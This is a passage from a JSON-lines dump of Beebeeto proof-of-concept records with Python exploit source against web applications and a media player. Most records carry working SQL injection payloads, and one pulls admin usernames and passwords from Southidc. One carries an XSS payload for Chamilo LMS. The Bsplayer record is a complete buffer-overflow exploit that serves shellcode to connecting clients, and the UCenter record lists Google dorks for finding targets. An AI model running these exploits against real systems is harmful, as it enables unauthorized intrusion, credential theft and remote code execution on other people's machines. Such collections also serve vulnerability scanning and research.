'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'ShopBuilder',\r\n 'vul_version': ['*'],\r\n 'type': 'SQL Injection',\r\n 'tag': ['ShopBuilder\u6f0f\u6d1e', '/?m=product&s=list&ptype', 'SQL Injection', 'ShopBuilder'],\r\n 'desc': '?m=product&s=list&ptype=0\uff0csqli=ptype',\r\n 'references': ['http://www.wooyun.org/bugs/wooyun-2014-080770'],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n url = args['options']['target']\r\n payload = (\"/?m=product&s=list&ptype=0%27%20and%201%3Dupdatexml%281%2Cconcat%280x5c%2Cmd5\"\r\n \"%28222222%29%29%2C1%29%23\")\r\n verify_url = url + payload\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = requests.get(url).content\r\n if 'e3ceb5881a0a1fdaad01296d7554868d' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\nif __name__ == '__main__':\r\n from pprint import 
pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "?m=product&s=list&ptype=0\uff0csqli=ptype", "app_name": "ShopBuilder", "id": "poc-2015-0074", "layer4_protocol": null}
{"create_date": "2015-03-27 19:57:52", "name": "Southidc \u5357\u65b9\u6570\u636e 11.0 /news_search.asp SQL\u6ce8\u5165\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "Ca2fux1n", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "southidc,news_search.asp,SQL Injection,\u5357\u65b9\u6570\u636e", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0073',\r\n 'name': 'Southidc \u5357\u65b9\u6570\u636e 11.0 /news_search.asp SQL\u6ce8\u5165\u6f0f\u6d1e POC',\r\n 'author': 'ca2fux1n',\r\n 'create_date': '2015-03-24',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'southidc',\r\n 'vul_version': ['11.0'],\r\n 'type': 'SQL Injection',\r\n 'tag': ['southidc', 'news_search.asp', 'SQL Injection', '\u5357\u65b9\u6570\u636e'],\r\n 'desc': 'southidc v10.0\u5230v11.0\u7248\u672c\u4e2dnews_search.asp\u6587\u4ef6\u5bf9key\u53c2\u6570\u6ca1\u6709\u9002\u5f53\u8fc7\u6ee4\uff0c\u5bfc\u81f4SQL\u6ce8\u5165\u6f0f\u6d1e\u3002',\r\n 'references': ['http://sebug.net/vuldb/ssvid-62399'],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n verify_url = args['options']['target'] + '/news_search.asp?'\r\n payload = (\"key=7'%20Union%20select%200,username%2bchr(124)%2bpassword,\"\r\n \"2,3,4,5,6,7,8,9%20from%20admin%20where%1%20or%20''='&otype=title&Submit=%CB%D1%CB%F7\")\r\n req = urllib2.Request(verify_url + payload)\r\n res = urllib2.urlopen(req)\r\n content = res.read()\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' 
+ verify_url + payload\r\n if res.code == 200:\r\n pattern = re.compile(r'.*?\\\">(?P<username>[a-zA-Z0-9]+)\\|(?P<password>[a-zA-Z0-9]+)',re.I|re.S)\r\n match = pattern.match(content)\r\n if match:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url + payload\r\n return args\r\n\r\n exploit = verify\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "southidc v10.0\u5230v11.0\u7248\u672c\u4e2dnews_search.asp\u6587\u4ef6\u5bf9key\u53c2\u6570\u6ca1\u6709\u9002\u5f53\u8fc7\u6ee4\uff0c\u5bfc\u81f4SQL\u6ce8\u5165\u6f0f\u6d1e\u3002", "app_name": "Southidc", "id": "poc-2015-0073", "layer4_protocol": null}
{"create_date": "2015-03-25 14:20:07", "name": "Bsplayer 2.68 Universal HTTP Response Exploit", "level": "\u9ad8\u5371", "batchable": 0, "author": "\u96f7\u8702", "rank": 4, "port": null, "vul_type": "\u7f13\u51b2\u533a\u6ea2\u51fa", "tag": "Bsplayer\u6f0f\u6d1e,Bsplayer\u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e,HTTP Response Exploit", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport sys\r\nimport socket\r\nimport urlparse\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0072',\r\n 'name': 'Bsplayer 2.68 Universal HTTP Response Exploit',\r\n 'author': 'fady_osman',\r\n 'create_date': '2015-03-24',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Bsplayer',\r\n 'vul_version': ['2.68'],\r\n 'type': 'Buffer Overflow',\r\n 'tag': ['Bsplayer\u6f0f\u6d1e', 'Bsplayer\u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e', 'HTTP Response Exploit'],\r\n 'desc': '''\r\n Bsplayer suffers from a buffer overflow vulnerability when processing the HTTP response when opening a URL.\r\n In order to exploit this bug I partially overwrited the seh record to land at pop pop ret instead of the full\r\n address and then used backward jumping to jump to a long jump that eventually land in my shellcode.\r\n\r\n Tested on : windows xp sp1 - windows 7 sp1 - Windows 8 Enterprise it might work in other versions as well just give it a try :)\r\n\r\n My twitter: @fady_osman\r\n My youtube: https://www.youtube.com/user/cutehack3r\r\n ''',\r\n 'references': ['http://www.exploit-db.com/exploits/36477/',\r\n ],\r\n },\r\n }\r\n\r\n def _init_user_parser(self): # 
\u5b9a\u5236\u547d\u4ee4\u884c\u53c2\u6570\r\n self.user_parser.add_option('-p','--port',\r\n action='store', dest='port', type='string', default=80,\r\n help='about port msg.')\r\n\r\n\r\n @classmethod\r\n def exploit(cls, args):\r\n s = socket.socket() # Create a socket object\r\n url = urlparse.urlparse(args['options']['target']).netloc\r\n host = socket.gethostbyname(url) # Ip to listen to.\r\n port = args['options']['port'] # Reserve a port for your service.\r\n s.bind((host, port)) # Bind to the port\r\n if args['options']['verbose']:\r\n print \"[*] Listening on port \" + str(port)\r\n s.listen(10) # Now wait for client connection.\r\n c, addr = s.accept() # Establish connection with client.\r\n # Sending the m3u file so we can reconnect to our server to send both the flv file and later the payload.\r\n if args['options']['verbose']:\r\n print(('[*] Sending the payload first time', addr))\r\n c.recv(1024)\r\n #seh and nseh.\r\n buf = \"\"\r\n buf += \"\\xbb\\xe4\\xf3\\xb8\\x70\\xda\\xc0\\xd9\\x74\\x24\\xf4\\x58\\x31\"\r\n buf += \"\\xc9\\xb1\\x33\\x31\\x58\\x12\\x83\\xc0\\x04\\x03\\xbc\\xfd\\x5a\"\r\n buf += \"\\x85\\xc0\\xea\\x12\\x66\\x38\\xeb\\x44\\xee\\xdd\\xda\\x56\\x94\"\r\n buf += \"\\x96\\x4f\\x67\\xde\\xfa\\x63\\x0c\\xb2\\xee\\xf0\\x60\\x1b\\x01\"\r\n buf += \"\\xb0\\xcf\\x7d\\x2c\\x41\\xfe\\x41\\xe2\\x81\\x60\\x3e\\xf8\\xd5\"\r\n buf += \"\\x42\\x7f\\x33\\x28\\x82\\xb8\\x29\\xc3\\xd6\\x11\\x26\\x76\\xc7\"\r\n buf += \"\\x16\\x7a\\x4b\\xe6\\xf8\\xf1\\xf3\\x90\\x7d\\xc5\\x80\\x2a\\x7f\"\r\n buf += \"\\x15\\x38\\x20\\x37\\x8d\\x32\\x6e\\xe8\\xac\\x97\\x6c\\xd4\\xe7\"\r\n buf += \"\\x9c\\x47\\xae\\xf6\\x74\\x96\\x4f\\xc9\\xb8\\x75\\x6e\\xe6\\x34\"\r\n buf += \"\\x87\\xb6\\xc0\\xa6\\xf2\\xcc\\x33\\x5a\\x05\\x17\\x4e\\x80\\x80\"\r\n buf += \"\\x8a\\xe8\\x43\\x32\\x6f\\x09\\x87\\xa5\\xe4\\x05\\x6c\\xa1\\xa3\"\r\n buf += \"\\x09\\x73\\x66\\xd8\\x35\\xf8\\x89\\x0f\\xbc\\xba\\xad\\x8b\\xe5\"\r\n buf += 
\"\\x19\\xcf\\x8a\\x43\\xcf\\xf0\\xcd\\x2b\\xb0\\x54\\x85\\xd9\\xa5\"\r\n buf += \"\\xef\\xc4\\xb7\\x38\\x7d\\x73\\xfe\\x3b\\x7d\\x7c\\x50\\x54\\x4c\"\r\n buf += \"\\xf7\\x3f\\x23\\x51\\xd2\\x04\\xdb\\x1b\\x7f\\x2c\\x74\\xc2\\x15\"\r\n buf += \"\\x6d\\x19\\xf5\\xc3\\xb1\\x24\\x76\\xe6\\x49\\xd3\\x66\\x83\\x4c\"\r\n buf += \"\\x9f\\x20\\x7f\\x3c\\xb0\\xc4\\x7f\\x93\\xb1\\xcc\\xe3\\x72\\x22\"\r\n buf += \"\\x8c\\xcd\\x11\\xc2\\x37\\x12\"\r\n\r\n jmplong = \"\\xe9\\x85\\xe9\\xff\\xff\"\r\n nseh = \"\\xeb\\xf9\\x90\\x90\"\r\n # Partially overwriting the seh record (nulls are ignored).\r\n seh = \"\\x3b\\x58\\x00\\x00\"\r\n buflen = len(buf)\r\n response = \"\\x90\" *2048 + buf + \"\\xcc\" * (6787 - 2048 - buflen) + jmplong + nseh + seh #+ \"\\xcc\" * 7000\r\n c.send(response)\r\n c.close()\r\n c, addr = s.accept() # Establish connection with client.\r\n # Sending the m3u file so we can reconnect to our server to send both the flv file and later the payload.\r\n if args['options']['verbose']:\r\n print(('[*] Sending the payload second time', addr))\r\n c.recv(1024)\r\n c.send(response)\r\n c.close()\r\n s.close()\r\n args['success'] = True\r\n return args\r\n\r\n verify = exploit\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "Tested on : windows xp sp1 - windows 7 sp1 - Windows 8 Enterprise it might work in other versions as well just give it a try :)", "app_name": "Other", "id": "poc-2015-0072", "layer4_protocol": null}
{"create_date": "2015-03-24 15:02:28", "name": "UCenter Home 2.0 /shop.php SQL\u6ce8\u5165\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "tmp", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "Discuz UCenter Home\u6f0f\u6d1e,/shop.php\u6f0f\u6d1e,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0069',\r\n 'name': 'UCenter Home 2.0 /shop.php SQL\u6ce8\u5165\u6f0f\u6d1e POC',\r\n 'author': 'tmp',\r\n 'create_date': '2015-03-24',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Discuz',\r\n 'vul_version': ['2.0'],\r\n 'type': 'SQL Injection',\r\n 'tag': ['Discuz UCenter Home\u6f0f\u6d1e', '/shop.php\u6f0f\u6d1e', 'php'],\r\n 'desc': '''\r\n Script HomePage : http://u.discuz.net/\r\n Dork : Powered by UCenter inurl:shop.php?ac=view\r\n Dork 2 : inurl:shop.php?ac=view&shopid=\r\n ''',\r\n 'references': ['http://www.exploit-db.com/exploits/14997/',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n url = args['options']['target']\r\n payload = (\"/shop.php?ac=view&shopid=253 AND (SELECT 4650 FROM(SELECT COUNT(*),\"\r\n \"CONCAT(0x716b6a6271,(SELECT (CASE WHEN (4650=4650) THEN 1 ELSE 0 END)),\"\r\n \"0x7178787071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)\")\r\n verify_url = url + payload\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = requests.get(verify_url).content\r\n if 'qkjbq1qxxpq1' in content:\r\n args['success'] = True\r\n 
args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "Script HomePage : http://u.discuz.net/\r\nDork : Powered by UCenter inurl:shop.php?ac=view\r\nDork 2 : inurl:shop.php?ac=view&shopid=", "app_name": "Discuz", "id": "poc-2015-0069", "layer4_protocol": null}
{"create_date": "2015-03-20 15:16:01", "name": "Chamilo LMS 1.9.10 /main/calendar/agenda_list.php \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "user1018", "rank": 1, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "Chamilo LMS\u6f0f\u6d1e,xss\u6f0f\u6d1e,\u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0068',\r\n 'name': 'Chamilo LMS 1.9.10 /main/calendar/agenda_list.php \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC',\r\n 'author': 'user1018',\r\n 'create_date': '2015-03-20',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Chamilo LMS', \r\n 'vul_version': ['1.9.10'],\r\n 'type': 'Cross Site Scripting',\r\n 'tag': ['Chamilo LMS\u6f0f\u6d1e', 'xss\u6f0f\u6d1e', '\u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e', 'php'],\r\n 'desc': 'N/A',\r\n 'references': ['http://www.exploit-db.com/exploits/36435/',\r\n ],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n url = args['options']['target'] + '/main/calendar/agenda_list.php'\r\n verify_url = url + '?type=personal%27%3E%3Cscript%3Econfirm%281%29%3C%2fscript%3E%3C%21--'\r\n request = urllib2.Request(verify_url)\r\n response = urllib2.urlopen(request)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = response.read()\r\n if \"<script>confirm(1)</script>\" in content:\r\n args['success'] = True\r\n args['poc_ret']['xss_url'] = verify_url\r\n return args\r\n\r\n exploit = 
verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "N/A", "app_name": "Other", "id": "poc-2015-0068", "layer4_protocol": null}
{"create_date": "2015-03-18 14:42:11", "name": "GeniXCMS v0.0.1 /index.php SQL INJECTION POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "Ca2fux1n", "rank": 2, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "GeniXCMS SQL\u6ce8\u5165\u6f0f\u6d1e,/index.php\u6f0f\u6d1e,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0067',\r\n 'name': 'GeniXCMS v0.0.1 /index.php SQL INJECTION POC',\r\n 'author': 'ca2fux1n',\r\n 'create_date': '2015-03-11',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'GeniXCMS',\r\n 'vul_version': ['0.0.1'],\r\n 'type': 'SQL Injection',\r\n 'tag': ['GeniXCMS SQL\u6ce8\u5165\u6f0f\u6d1e', '/index.php\u6f0f\u6d1e', 'php'],\r\n 'desc': 'GeniXCMS v0.0.1 Remote Unauthenticated SQL Injection Exploite',\r\n 'references': ['http://www.exploit-db.com/exploits/36321/',\r\n ],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n url = args['options']['target']\r\n payload = \"/genixcms/index.php?page=1' UNION ALL SELECT 1,2,md5('bb2'),4,5,6,7,8,9,10 and 'j'='j\"\r\n verify_url = url + payload\r\n content = requests.get(verify_url).content\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n if '0c72305dbeb0ed430b79ec9fc5fe8505' in content:\r\n args['options']['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "GeniXCMS v0.0.1 Remote 
Unauthenticated SQL Injection Exploit", "app_name": "Other", "id": "poc-2015-0067", "layer4_protocol": null}
{"create_date": "2015-03-13 10:10:49", "name": "GNUboard /bbs/poll_update.php SQL Injection Vulnerability POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "1024", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "GNUboard\u6f0f\u6d1e,SQL\u6ce8\u5165\u6f0f\u6d1e,/bbs/poll_update.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0063',\r\n 'name': 'GNUboard /bbs/poll_update.php SQL Injection Vulnerability POC',\r\n 'author': '1024',\r\n 'create_date': '2015-03-13',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'GNUboard',\r\n 'vul_version': ['*'],\r\n 'type': 'SQL Injection',\r\n 'tag': ['GNUboard\u6f0f\u6d1e', 'SQL\u6ce8\u5165\u6f0f\u6d1e', '/bbs/poll_update.php', 'php'],\r\n 'desc': 'GNUboard \u901a\u7528\u578b\u6ce8\u5165SQL Injection\uff0c\u636e\u6d4b\u8bd5\u57fa\u672c\u4e0a\u5927\u90e8\u5206\u7684\u7248\u672c\u90fd\u53ef\u4ee5.',\r\n 'references': ['N/A',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n url = args['options']['target']\r\n req = requests.get(url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + url\r\n if req.status_code == 200:\r\n po_ids = re.findall(r'name=\"po_id\" value=\"(\\d+)\"', req.content)\r\n for po_id in po_ids:\r\n verify_url = url + '/poll_update.php'\r\n post = (\"_SERVER[REMOTE_ADDR]=86117&po_id=%s&gb_poll=1=1 and(select 1 from(select\"\r\n \"count(*),concat((select md5(123)),floor(rand(0)*2))x from information_schema.tables group by\"\r\n 
\"x)a)\") % po_id\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n print '[*] POST Content: ' + post\r\n reqp = requests.post(verify_url, data=post)\r\n if reqp.status_code == 200 and '202cb962ac59075b964b07152d234b70' in reqp.content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n args['poc_ret']['post_content'] = post\r\n return args\r\n return args\r\n\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "GNUboard \u901a\u7528\u578b\u6ce8\u5165SQL Injection\uff0c\u636e\u6d4b\u8bd5\u57fa\u672c\u4e0a\u5927\u90e8\u5206\u7684\u7248\u672c\u90fd\u53ef\u4ee5.", "app_name": "Gnuboard", "id": "poc-2015-0063", "layer4_protocol": null}
{"create_date": "2015-03-12 16:53:49", "name": "Ecshop /spellchecker.php \u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "tmp", "rank": 1, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "Ecshop\u6f0f\u6d1e,Ecshop\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e,/spellchecker.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0060',\r\n 'name': 'Ecshop /spellchecker.php \u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e POC',\r\n 'author': 'tmp',\r\n 'create_date': '2015-03-12',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Ecshop',\r\n 'vul_version': ['*'],\r\n 'type': 'Information Disclosure',\r\n 'tag': ['Ecshop\u6f0f\u6d1e', 'Ecshop\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e', '/spellchecker.php', 'php'],\r\n 'desc': 'N/A',\r\n 'references': ['https://www.bugscan.net/#!/n/293',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = '/includes/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php'\r\n verify_url = args['options']['target'] + payload\r\n req = requests.get(verify_url)\r\n if req.status_code == 200:\r\n m = re.search('in <b>([^<]+)</b> on line <b>(\\d+)</b>', req.content)\r\n if m:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n args['success'] = False\r\n return args\r\n\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n 
pprint(mp.run())", "desc": "N/A", "app_name": "Ecshop", "id": "poc-2015-0060", "layer4_protocol": null}
{"create_date": "2015-03-12 16:43:01", "name": "BlueCMS v1.6 sp1 /ad_js.php SQL\u6ce8\u5165\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "tmp", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "BlueCMS\u6f0f\u6d1e,SQL\u6ce8\u5165\u6f0f\u6d1e,/ad_js.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0059',\r\n 'name': 'BlueCMS v1.6 sp1 /ad_js.php SQL\u6ce8\u5165\u6f0f\u6d1e POC',\r\n 'author': 'tmp',\r\n 'create_date': '2015-03-12',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'BlueCMS',\r\n 'vul_version': ['1.6'],\r\n 'type': 'SQL Injection',\r\n 'tag': ['BlueCMS\u6f0f\u6d1e', 'SQL\u6ce8\u5165\u6f0f\u6d1e', '/ad_js.php', 'php'],\r\n 'desc': '''\r\n BlueCMS(\u5730\u65b9\u5206\u7c7b\u4fe1\u606f\u95e8\u6237\u4e13\u7528CMS\u7cfb\u7edf)\r\n \r\n $ad_id = !empty($_GET['ad_id']) ? 
trim($_GET['ad_id']) : ''; //\u6839\u76ee\u5f55\u4e0b\u5176\u4ed6\u6587\u4ef6\u90fd\u505a\u4e86\u5f88\u597d\u7684\u8fc7\u6ee4\uff0c\r\n \u5bf9\u6570\u5b57\u578b\u53d8\u91cf\u51e0\u4e4e\u90fd\u7528\u4e86intval()\u505a\u9650\u5236\uff0c\u552f\u72ec\u6f0f\u4e86\u8fd9\u4e2a\u6587\u4ef6\uff0c\u5c45\u7136\u53ea\u662f\u7528\u4e86trim()\u53bb\u9664\u5934\u5c3e\u7a7a\u683c\u3002\r\n $ad = $db->getone(\"SELECT * FROM \".table('ad').\" WHERE ad_id =\".$ad_id); //\u76f4\u63a5\u4ee3\u5165\u67e5\u8be2\u3002\r\n ''',\r\n 'references': ['http://www.myhack58.com/Article/html/3/7/2010/27774_2.htm',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = \"/ad_js.php?ad_id=1%20and%201=2%20union%20select%201,2,3,4,5,md5(3.1415),md5(3.1415)\"\r\n verify_url = args['options']['target'] + payload\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n if '63e1f04640e83605c1d177544a5a0488' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "BlueCMS(\u5730\u65b9\u5206\u7c7b\u4fe1\u606f\u95e8\u6237\u4e13\u7528CMS\u7cfb\u7edf)\r\n\r\n$ad_id = !empty($_GET['ad_id']) ? trim($_GET['ad_id']) : ''; //\u6839\u76ee\u5f55\u4e0b\u5176\u4ed6\u6587\u4ef6\u90fd\u505a\u4e86\u5f88\u597d\u7684\u8fc7\u6ee4\uff0c\r\n\u5bf9\u6570\u5b57\u578b\u53d8\u91cf\u51e0\u4e4e\u90fd\u7528\u4e86intval()\u505a\u9650\u5236\uff0c\u552f\u72ec\u6f0f\u4e86\u8fd9\u4e2a\u6587\u4ef6\uff0c\u5c45\u7136\u53ea\u662f\u7528\u4e86trim()\u53bb\u9664\u5934\u5c3e\u7a7a\u683c\u3002\r\n$ad = $db->getone(\"SELECT * FROM \".table('ad').\" WHERE ad_id =\".$ad_id); //\u76f4\u63a5\u4ee3\u5165\u67e5\u8be2\u3002", "app_name": "Other", "id": "poc-2015-0059", "layer4_protocol": null}
